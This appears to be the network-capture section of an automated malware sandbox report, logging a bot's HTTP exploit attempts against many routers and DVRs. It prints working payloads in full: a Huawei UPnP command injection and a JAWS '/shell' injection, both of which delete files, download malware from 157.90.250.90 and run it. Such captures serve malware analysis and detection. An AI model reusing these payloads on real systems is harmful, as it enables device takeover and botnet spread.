73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:35.143340111 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:38.946815014 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          587192.168.2.2335298174.84.210.380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:31.914563894 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:32.074532032 CET500INHTTP/1.0 400 Bad Request
                                                          Content-Type: text/html
                                                          Content-Length: 349
                                                          Connection: close
                                                          Date: Tue, 02 Jan 2024 05:25:32 GMT
                                                          Server: HTTP Server
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          588192.168.2.2360656104.80.89.1780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:31.932213068 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:32.110033989 CET428INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 206
                                                          Expires: Tue, 02 Jan 2024 05:25:32 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:32 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 35 39 35 30 36 38 26 23 34 36 3b 31 37 30 34 31 37 33 31 33 32 26 23 34 36 3b 33 33 36 34 33 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;e595068&#46;1704173132&#46;33643a</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          589192.168.2.2333266184.26.2.23980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:32.158282995 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:32.402208090 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:32 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:32 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 62 66 30 31 32 30 32 26 23 34 36 3b 31 37 30 34 31 37 33 31 33 32 26 23 34 36 3b 32 63 30 62 30 31 37 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;6bf01202&#46;1704173132&#46;2c0b0171</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          590192.168.2.2350818213.92.76.14980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:32.164890051 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:32.415872097 CET495INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:32 GMT
                                                          Server: Apache/2.4.18 (Ubuntu)
                                                          Content-Length: 301
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 75 67 75 72 69 2e 69 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.18 (Ubuntu) Server at auguri.it Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          591192.168.2.2360554220.134.75.18280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:32.202179909 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          592192.168.2.23414181.214.84.980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:32.217581987 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:32.519757986 CET414INHTTP/1.1 302 Moved Temporarily
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:32 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 138
                                                          Location: http://127.0.0.1/?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Connection: keep-alive
                                                          Keep-Alive: timeout=20
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          593192.168.2.2360064175.27.12.21980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:32.237663984 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:34.291126013 CET382INHTTP/1.1 302 Moved Temporarily
                                                          Server: stgw
                                                          Date: Tue, 02 Jan 2024 05:25:32 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 137
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 73 74 67 77 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>stgw</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          594192.168.2.2343616208.109.173.19880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:34.668261051 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:34.816945076 CET1286INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:34 GMT
                                                          Server: Apache
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade, close
                                                          Accept-Ranges: bytes
                                                          Vary: Accept-Encoding
                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: 0
                                                          Content-Type: text/html
                                                          Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a
                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%;
                                                          Jan 2, 2024 06:25:34.816961050 CET1286INData Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61
                                                          Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat:
                                                          Jan 2, 2024 06:25:34.816982031 CET1286INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20
                                                          Data Ascii: } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer
                                                          Jan 2, 2024 06:25:34.817020893 CET1286INData Raw: 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b
                                                          Data Ascii: ; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0;
                                                          Jan 2, 2024 06:25:34.817101002 CET1286INData Raw: 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38
